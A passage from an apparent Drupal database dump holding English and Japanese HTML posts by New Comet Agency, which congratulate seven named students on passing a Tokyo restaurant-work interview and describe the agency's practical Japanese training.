バッチの初回クラスが本日無事終了しました。体系的に知識を学生に伝えてくださる熱心な講師の方々に、ニューコメットを代表して心から感謝申し上げます。面接に合格した学生のトレーニングと準備が成功したニューコメットは、遅滞なく就職の応募を奨励しています。</p><img src=\"/sites/default/files/inline-images/0-02-01-0c1c787e25a0038a004c8fb1f1f3fef5a1206b844d7b9547f7abeb925d0273aa_8177a77005454691.jpg\" data-entity-uuid=\"8b96569d-54ab-42eb-8511-29e44bc7d66f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-1d2afaf1819b313743c675427b7a9036b89100980bf89a95b21232137cba4f6c_d617be5df38857d4.jpg\" data-entity-uuid=\"838d79df-114c-4c64-95cf-79c5ed8a7a04\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-6d78d6e7e6e3c013ffff587c73022012428516c84e4708ef4eddab92785a1b25_e4fa61dc1f0a7eaa.jpg\" data-entity-uuid=\"b80d1b92-a725-44c1-a64d-8dd8415dcbe9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7aea772f8533f509651ad0ce89b0eb5d270b4758f6edd7566f71575c1c12d764_37459e5c5941b0a5.jpg\" data-entity-uuid=\"1d2edae8-34c8-4310-8118-f9551afe3a96\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-9e53bae7c248717b51723e13b61b802d8df17dd4c1c7da8f3b04ec00c5d72ef1_228aff5a82ac6a25.jpg\" data-entity-uuid=\"b68bc03d-52d2-44da-8975-eb3adce1de40\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-2302c783d003bda12faf3fdd393353a03cc6136ae6bb3f9cdfdb068d7b2fac25_7c99ac1472131a12.jpg\" data-entity-uuid=\"defb62ed-14d1-492c-ac75-b58d1404c12d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-d5dac7dda6d581cbc470feebbbd468d980c627d2a061f3651e8f19667e488377_60d78d918658494d.jpg\" data-entity-uuid=\"427ad047-f490-47dc-a8fb-c672cbaf09e0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-de13510039a9d12d12a13345862bc0c6374a231d8abb6e9d7d62857e50efedab_b7d7f45f1ac532ed.jpg\" data-entity-uuid=\"85aa4ffd-37d9-46d2-8e35-3ae912d0e4b8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e3da82c6466cf309c553b6356c24dc7637df56327162829a054e8a1e76707da0_cbef71a7e5f47f26.jpg\" data-entity-uuid=\"25dc1e52-8259-40f7-8161-a809b26f9261\" data-entity-type=\"file\"></div></div></div><div class=\"mt-1 flex gap-3 empty:hidden juice:-ml-3\"><div class=\"-ml-1 mt-0 flex h-7 items-center justify-center gap-[2px] self-end text-gray-400 lg:justify-start lg:self-center visible\"><span class=\"\" data-state=\"closed\"><button class=\"rounded-md p-1 text-token-text-tertiary hover:text-token-text-primary\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md-heavy\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M7 5a3 3 0 0 1 3-3h9a3 3 0 0 1 3 3v9a3 3 0 0 1-3 3h-2v2a3 3 0 0 1-3 3H5a3 3 0 0 1-3-3v-9a3 3 0 0 1 3-3h2zm2 2h5a3 3 0 0 1 3 3v5h2a1 1 0 0 0 1-1V5a1 1 0 0 0-1-1h-9a1 1 0 0 0-1 1zM5 9a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h9a1 1 0 0 0 1-1v-9a1 1 0 0 0-1-1z\" clip-rule=\"evenodd\"></path></svg></button></span></div></div><div class=\"pr-2 lg:pr-0\">&nbsp;</div><div class=\"mt-3 w-full empty:hidden\"><div class=\"text-center\">&nbsp;</div></div></div><div class=\"absolute\"><span class=\"\" data-state=\"closed\"><button class=\"btn relative btn-secondary btn-small shadow-lg\"><div class=\"flex items-center justify-center\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md\"><path fill=\"currentColor\" d=\"M7.5 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.514 2.79a1 1 0 0 0 .283 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7M16.18 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.513 2.79a1 1 0 0 0 .282 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7\"></path></svg></div></button></span></div></div></div></div></div></div></div></div></div></div><div class=\"w-full md:pt-0 dark:border-white/20 md:border-transparent md:dark:border-transparent md:w-[calc(100%-.5rem)] juice:w-full\"><div class=\"px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><form class=\"w-full\" type=\"button\" aria-haspopup=\"dialog\" aria-expanded=\"false\" aria-controls=\"radix-:r1:\" data-state=\"closed\"><div class=\"relative flex h-full max-w-full flex-1 flex-col\"><div class=\"absolute bottom-full left-0 right-0 z-20\"><div class=\"relative h-full w-full\"><div class=\"flex flex-col gap-3.5 pb-3.5 pt-2\"><div class=\"text-sm rounded-xl p-4 text-token-text-secondary flex items-center gap-3 fruit:rounded-2xl border border-token-border-light bg-token-main-surface-primary\">&nbsp;</div></div></div></div></div></form></div></div></div>', '', 'full_html'),
('activities', 0, 134, 566, 'en', 0, '<blockquote><h2>CONGRATULATIONS!&nbsp;</h2></blockquote><p>Congratulations to&nbsp;</p><ul><li>EI SHWE ZIN</li><li>THAE KO KO</li><li>EI KHIN</li><li>AUNG PYAE PAING</li><li>LWIN PHYO KO KO</li><li>HNIN EI PHYU</li><li>YU YU NYEIN&nbsp;</li></ul><p>for passing Interview for TOKUTEI GAISHOKU (Restaurant) to work at TOKYO City, JAPAN!!&nbsp;</p><p>&nbsp;</p><img data-entity-uuid=\"2bc479ec-e7ba-498e-8704-4530652df12e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/EI%20SHWE%20ZIN_0.jpg\"><img data-entity-uuid=\"86bf19ac-1bbd-48da-9fc4-f3927dff557b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/THAE%20KO%20KO.jpg\"><img data-entity-uuid=\"103515d9-16ed-4e9e-9e9a-67295929aab1\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/EI%20KHIN.jpg\"><img data-entity-uuid=\"ccf065ad-1962-4f2c-9ce3-dba25d06c3fc\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/AUNG%20PYAE%20PAING.jpg\"><img data-entity-uuid=\"dd9d7676-2373-40db-bba2-ab5daf943a46\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/LWIN%20PHYO%20KO%20KO_1.jpg\"><img data-entity-uuid=\"f2785092-a5e7-45c9-b78c-6534b7e2b419\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/HNIN%20EI%20PHYU_0.jpg\"><img data-entity-uuid=\"c033e30d-60d9-472a-a1c0-115701ac14e0\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/YU%20YU%20NYEIN_0.jpg\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 134, 567, 'en', 0, '<blockquote><h2>CONGRATULATIONS!&nbsp;</h2></blockquote><p>Congratulations to&nbsp;</p><ul><li>EI SHWE ZIN</li><li>THAE KO KO</li><li>EI KHIN</li><li>AUNG PYAE PAING</li><li>LWIN PHYO KO KO</li><li>HNIN EI PHYU</li><li>YU YU NYEIN&nbsp;</li></ul><p>for passing Interview for TOKUTEI GAISHOKU (Restaurant) to work at TOKYO City, JAPAN!!&nbsp;</p><p>&nbsp;</p><img data-entity-uuid=\"2bc479ec-e7ba-498e-8704-4530652df12e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/EI%20SHWE%20ZIN_0.jpg\"><img data-entity-uuid=\"86bf19ac-1bbd-48da-9fc4-f3927dff557b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/THAE%20KO%20KO.jpg\"><img data-entity-uuid=\"103515d9-16ed-4e9e-9e9a-67295929aab1\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/EI%20KHIN.jpg\"><img data-entity-uuid=\"ccf065ad-1962-4f2c-9ce3-dba25d06c3fc\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/AUNG%20PYAE%20PAING.jpg\"><img data-entity-uuid=\"dd9d7676-2373-40db-bba2-ab5daf943a46\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/LWIN%20PHYO%20KO%20KO_1.jpg\"><img data-entity-uuid=\"f2785092-a5e7-45c9-b78c-6534b7e2b419\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/HNIN%20EI%20PHYU_0.jpg\"><img data-entity-uuid=\"c033e30d-60d9-472a-a1c0-115701ac14e0\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/YU%20YU%20NYEIN_0.jpg\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 134, 567, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>日本の東京市にある「特選外食」の面接に合格しました</p><p>さん</p><ul><li>EI SHWE ZIN さん,</li><li>THAE KO KO さん,</li><li>EI KHIN さん,</li><li>AUNG PYAE PAING さん,</li><li>LWIN PHYO KO KO さん,</li><li>HNIN EI PHYU さん,</li><li>YU YU NYEIN さん,</li></ul><p>、おめでとうございます!!</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/EI%20SHWE%20ZIN_0.jpg\" data-entity-uuid=\"2bc479ec-e7ba-498e-8704-4530652df12e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/THAE%20KO%20KO.jpg\" data-entity-uuid=\"86bf19ac-1bbd-48da-9fc4-f3927dff557b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/EI%20KHIN.jpg\" data-entity-uuid=\"103515d9-16ed-4e9e-9e9a-67295929aab1\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/AUNG%20PYAE%20PAING.jpg\" data-entity-uuid=\"ccf065ad-1962-4f2c-9ce3-dba25d06c3fc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/LWIN%20PHYO%20KO%20KO_1.jpg\" data-entity-uuid=\"dd9d7676-2373-40db-bba2-ab5daf943a46\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/HNIN%20EI%20PHYU_0.jpg\" data-entity-uuid=\"f2785092-a5e7-45c9-b78c-6534b7e2b419\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/YU%20YU%20NYEIN_0.jpg\" data-entity-uuid=\"c033e30d-60d9-472a-a1c0-115701ac14e0\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 135, 568, 'en', 0, '<blockquote><h2>Purpose Of Pratical Training</h2></blockquote><div class=\"flex-1 overflow-hidden\"><div class=\"h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-79elbk h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-1n7m0yu\"><div class=\"flex flex-col text-sm md:pb-9\"><div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-5\" data-scroll-anchor=\"true\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"group/conversation-turn relative flex w-full min-w-0 flex-col agent-turn\"><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"assistant\" data-message-id=\"f3c556c7-59b1-42a0-9643-f659a1bf9318\" dir=\"auto\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><p>At New Comet Agency, we are dedicated to delivering practical Japanese language education, ensuring that our students, upon passing restaurant interviews, can authentically engage without the need for pretense.Our experienced instructors facilitate learning through group activities and role-playing scenarios in kitchen settings, fostering practical skills among the children.It brings me great joy to witness the diligence and dedication shown by our students.Opportunities in the restaurant sector are currently available and actively seeking applicants.New Comet Agency strives to provide a supportive and seamless experience for our students. Thank you for placing your trust in New Comet Agency.</p><img data-entity-uuid=\"d461cd5e-81f8-4632-b976-098afb2f2d73\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-4c3297587b8913637c92ff50c2326e2f1021a9fcf056b7cb16d6ba29205df6a2_380971ba617052aa.jpg\"><img data-entity-uuid=\"9ab98bd6-5763-432d-8cdc-f211ec7cfe63\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-4d31ac152402a030c8ba31912543ea7a30250e000dab321739b6ba11ea001b42_b5bcd2939a1e8f15.jpg\"><img data-entity-uuid=\"98ce1e75-50bd-4f36-8438-9367b1cec93e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-7b2fccd2b733e7a9acd3aaca56c06c0a44b8844b6b8c17e6fd30f8a55428e630_b33caf32547d7ead.jpg\"><img data-entity-uuid=\"dce2a94d-c506-4477-ba5c-10795478f04e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-9e1fb5621c7e9a51b4ce4b236a1aecd884f5fc5f6260fee9ca019f5810da2b46_5093ee59ab653c67.jpg\"><img data-entity-uuid=\"ae0cc0b1-e07b-4ce9-b973-490e11905e7d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-323e892e3b1dbb3bdcaca698554089023aba895aff3f2786a8af55a6c50c2556_240eccd80bef4f49.jpg\"><img data-entity-uuid=\"6c2ead23-f816-4744-8222-3953e9dc78b4\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-5520d7fa39d01c233b91f5709191efe5c0f10a38588f72d9b7dbc9b0e8f29b88_4bf2b681fc914170.jpg\"><img data-entity-uuid=\"2e112512-7618-4177-9887-8b386bec688d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-98373069e88752acb3a3ce39562b0afc2adafa967f981a5561a45b55f0ae7d8d_da01565daa34c6c0.jpg\"><img data-entity-uuid=\"ca65e160-48f1-4987-bc32-8c183cd3f688\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-a28bd6a4223dab5056a4a96451178344954aa50db9f197e79916448a61b80b9f_71bb9f5b52350ed2.jpg\"><img data-entity-uuid=\"7def92f4-2793-4d57-84d8-3f641d7c91ff\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-ce1c8a821f40a67c1754a52f0495edaca6deafb497fd6b38ae4235b8b7b765f7_c28078628e919758.jpg\"></div></div></div><div class=\"mt-1 flex gap-3 empty:hidden juice:-ml-3\"><div class=\"-ml-1 mt-0 flex h-7 items-center justify-center gap-[2px] self-end text-gray-400 lg:justify-start lg:self-center visible\"><span class=\"\" data-state=\"closed\"><button class=\"rounded-md p-1 text-token-text-tertiary hover:text-token-text-primary\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md-heavy\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M7 5a3 3 0 0 1 3-3h9a3 3 0 0 1 3 3v9a3 3 0 0 1-3 3h-2v2a3 3 0 0 1-3 3H5a3 3 0 0 1-3-3v-9a3 3 0 0 1 3-3h2zm2 2h5a3 3 0 0 1 3 3v5h2a1 1 0 0 0 1-1V5a1 1 0 0 0-1-1h-9a1 1 0 0 0-1 1zM5 9a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h9a1 1 0 0 0 1-1v-9a1 1 0 0 0-1-1z\" clip-rule=\"evenodd\"></path></svg></button></span></div></div><div class=\"pr-2 lg:pr-0\">&nbsp;</div><div class=\"mt-3 w-full empty:hidden\"><div class=\"text-center\">&nbsp;</div></div></div><div class=\"absolute\"><span class=\"\" data-state=\"closed\"><button class=\"btn relative btn-secondary btn-small shadow-lg\"><div class=\"flex items-center justify-center\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md\"><path fill=\"currentColor\" d=\"M7.5 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.514 2.79a1 1 0 0 0 .283 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7M16.18 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.513 2.79a1 1 0 0 0 .282 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7\"></path></svg></div></button></span></div></div></div></div></div></div></div></div></div></div><div class=\"w-full md:pt-0 dark:border-white/20 md:border-transparent md:dark:border-transparent md:w-[calc(100%-.5rem)] juice:w-full\"><div class=\"px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><form class=\"w-full\" type=\"button\" aria-haspopup=\"dialog\" aria-expanded=\"false\" aria-controls=\"radix-:r1:\" data-state=\"closed\"><div class=\"relative flex h-full max-w-full flex-1 flex-col\"><div class=\"absolute bottom-full left-0 right-0 z-20\">&nbsp;</div><div class=\"flex w-full items-center\"><div class=\"overflow-hidden [&amp;:has(textarea:focus)]:border-token-border-xheavy [&amp;:has(textarea:focus)]:shadow-[0_2px_6px_rgba(0,0,0,.05)] flex flex-col w-full flex-grow relative border dark:text-white rounded-2xl bg-token-main-surface-primary border-token-border-medium\">&nbsp;</div></div></div></form></div></div></div>', '', 'full_html'),
('activities', 0, 135, 569, 'en', 0, '<blockquote><h2>Purpose Of Pratical Training</h2></blockquote><div class=\"flex-1 overflow-hidden\"><div class=\"h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-79elbk h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-1n7m0yu\"><div class=\"flex flex-col text-sm md:pb-9\"><div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-5\" data-scroll-anchor=\"true\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"group/conversation-turn relative flex w-full min-w-0 flex-col agent-turn\"><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"assistant\" data-message-id=\"f3c556c7-59b1-42a0-9643-f659a1bf9318\" dir=\"auto\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><p>At New Comet Agency, we are dedicated to delivering practical Japanese language education, ensuring that our students, upon passing restaurant interviews, can authentically engage without the need for pretense.Our experienced instructors facilitate learning through group activities and role-playing scenarios in kitchen settings, fostering practical skills among the children.It brings me great joy to witness the diligence and dedication shown by our students.Opportunities in the restaurant sector are currently available and actively seeking applicants.New Comet Agency strives to provide a supportive and seamless experience for our students. Thank you for placing your trust in New Comet Agency.</p><img data-entity-uuid=\"d461cd5e-81f8-4632-b976-098afb2f2d73\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-4c3297587b8913637c92ff50c2326e2f1021a9fcf056b7cb16d6ba29205df6a2_380971ba617052aa.jpg\"><img data-entity-uuid=\"9ab98bd6-5763-432d-8cdc-f211ec7cfe63\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-4d31ac152402a030c8ba31912543ea7a30250e000dab321739b6ba11ea001b42_b5bcd2939a1e8f15.jpg\"><img data-entity-uuid=\"98ce1e75-50bd-4f36-8438-9367b1cec93e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-7b2fccd2b733e7a9acd3aaca56c06c0a44b8844b6b8c17e6fd30f8a55428e630_b33caf32547d7ead.jpg\"><img data-entity-uuid=\"dce2a94d-c506-4477-ba5c-10795478f04e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-9e1fb5621c7e9a51b4ce4b236a1aecd884f5fc5f6260fee9ca019f5810da2b46_5093ee59ab653c67.jpg\"><img data-entity-uuid=\"ae0cc0b1-e07b-4ce9-b973-490e11905e7d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-323e892e3b1dbb3bdcaca698554089023aba895aff3f2786a8af55a6c50c2556_240eccd80bef4f49.jpg\"><img data-entity-uuid=\"6c2ead23-f816-4744-8222-3953e9dc78b4\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-5520d7fa39d01c233b91f5709191efe5c0f10a38588f72d9b7dbc9b0e8f29b88_4bf2b681fc914170.jpg\"><img data-entity-uuid=\"2e112512-7618-4177-9887-8b386bec688d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-98373069e88752acb3a3ce39562b0afc2adafa967f981a5561a45b55f0ae7d8d_da01565daa34c6c0.jpg\"><img data-entity-uuid=\"ca65e160-48f1-4987-bc32-8c183cd3f688\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-a28bd6a4223dab5056a4a96451178344954aa50db9f197e79916448a61b80b9f_71bb9f5b52350ed2.jpg\"><img data-entity-uuid=\"7def92f4-2793-4d57-84d8-3f641d7c91ff\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-ce1c8a821f40a67c1754a52f0495edaca6deafb497fd6b38ae4235b8b7b765f7_c28078628e919758.jpg\"></div></div></div><div class=\"mt-1 flex gap-3 empty:hidden juice:-ml-3\"><div class=\"-ml-1 mt-0 flex h-7 items-center justify-center gap-[2px] self-end text-gray-400 lg:justify-start lg:self-center visible\"><span class=\"\" data-state=\"closed\"><button class=\"rounded-md p-1 text-token-text-tertiary hover:text-token-text-primary\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md-heavy\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M7 5a3 3 0 0 1 3-3h9a3 3 0 0 1 3 3v9a3 3 0 0 1-3 3h-2v2a3 3 0 0 1-3 3H5a3 3 0 0 1-3-3v-9a3 3 0 0 1 3-3h2zm2 2h5a3 3 0 0 1 3 3v5h2a1 1 0 0 0 1-1V5a1 1 0 0 0-1-1h-9a1 1 0 0 0-1 1zM5 9a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h9a1 1 0 0 0 1-1v-9a1 1 0 0 0-1-1z\" clip-rule=\"evenodd\"></path></svg></button></span></div></div><div class=\"pr-2 lg:pr-0\">&nbsp;</div><div class=\"mt-3 w-full empty:hidden\"><div class=\"text-center\">&nbsp;</div></div></div><div class=\"absolute\"><span class=\"\" data-state=\"closed\"><button class=\"btn relative btn-secondary btn-small shadow-lg\"><div class=\"flex items-center justify-center\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md\"><path fill=\"currentColor\" d=\"M7.5 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.514 2.79a1 1 0 0 0 .283 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7M16.18 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.513 2.79a1 1 0 0 0 .282 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7\"></path></svg></div></button></span></div></div></div></div></div></div></div></div></div></div><div class=\"w-full md:pt-0 dark:border-white/20 md:border-transparent md:dark:border-transparent md:w-[calc(100%-.5rem)] juice:w-full\"><div class=\"px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><form class=\"w-full\" type=\"button\" aria-haspopup=\"dialog\" aria-expanded=\"false\" aria-controls=\"radix-:r1:\" data-state=\"closed\"><div class=\"relative flex h-full max-w-full flex-1 flex-col\"><div class=\"absolute bottom-full left-0 right-0 z-20\">&nbsp;</div><div class=\"flex w-full items-center\"><div class=\"overflow-hidden [&amp;:has(textarea:focus)]:border-token-border-xheavy [&amp;:has(textarea:focus)]:shadow-[0_2px_6px_rgba(0,0,0,.05)] flex flex-col w-full flex-grow relative border dark:text-white rounded-2xl bg-token-main-surface-primary border-token-border-medium\">&nbsp;</div></div></div></form></div></div></div>', '', 'full_html'),
('activities', 0, 135, 569, 'ja', 0, '<div class=\"flex-1 overflow-hidden\"><div class=\"h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-79elbk h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-1n7m0yu\"><div class=\"flex flex-col text-sm md:pb-9\"><div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-5\" data-scroll-anchor=\"true\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"group/conversation-turn relative flex w-full min-w-0 flex-col agent-turn\"><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"assistant\" data-message-id=\"f3c556c7-59b1-42a0-9643-f659a1bf9318\" dir=\"auto\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><blockquote><h2>実習の目的</h2></blockquote><p>ニューコメットエージェンシーでは、実用的な日本語教育を提供することに注力しており、レストランの面接に合格した生徒が、見せかけの必要もなく、本気で取り組めるようにしています。経験豊富なインストラクターが、グループ活動やキッチンでのロールプレイングのシナリオを通して学習を促進し、子供たちに実践的なスキルを育みます。生徒の勤勉さと献身を目の当たりにするのは、私にとって大きな喜びです。現在、レストラン部門での機会があり、積極的に応募者を募集しています。ニューコメットエージェンシーは、生徒にサポート的でシームレスな体験を提供することを目指しています。ニューコメットエージェンシーを信頼していただき、ありがとうございます。</p><img src=\"/sites/default/files/inline-images/0-02-01-4c3297587b8913637c92ff50c2326e2f1021a9fcf056b7cb16d6ba29205df6a2_380971ba617052aa.jpg\" data-entity-uuid=\"d461cd5e-81f8-4632-b976-098afb2f2d73\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-4d31ac152402a030c8ba31912543ea7a30250e000dab321739b6ba11ea001b42_b5bcd2939a1e8f15.jpg\" data-entity-uuid=\"9ab98bd6-5763-432d-8cdc-f211ec7cfe63\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7b2fccd2b733e7a9acd3aaca56c06c0a44b8844b6b8c17e6fd30f8a55428e630_b33caf32547d7ead.jpg\" data-entity-uuid=\"98ce1e75-50bd-4f36-8438-9367b1cec93e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-9e1fb5621c7e9a51b4ce4b236a1aecd884f5fc5f6260fee9ca019f5810da2b46_5093ee59ab653c67.jpg\" data-entity-uuid=\"dce2a94d-c506-4477-ba5c-10795478f04e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-323e892e3b1dbb3bdcaca698554089023aba895aff3f2786a8af55a6c50c2556_240eccd80bef4f49.jpg\" data-entity-uuid=\"ae0cc0b1-e07b-4ce9-b973-490e11905e7d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-5520d7fa39d01c233b91f5709191efe5c0f10a38588f72d9b7dbc9b0e8f29b88_4bf2b681fc914170.jpg\" data-entity-uuid=\"6c2ead23-f816-4744-8222-3953e9dc78b4\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-98373069e88752acb3a3ce39562b0afc2adafa967f981a5561a45b55f0ae7d8d_da01565daa34c6c0.jpg\" data-entity-uuid=\"2e112512-7618-4177-9887-8b386bec688d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-a28bd6a4223dab5056a4a96451178344954aa50db9f197e79916448a61b80b9f_71bb9f5b52350ed2.jpg\" data-entity-uuid=\"ca65e160-48f1-4987-bc32-8c183cd3f688\" 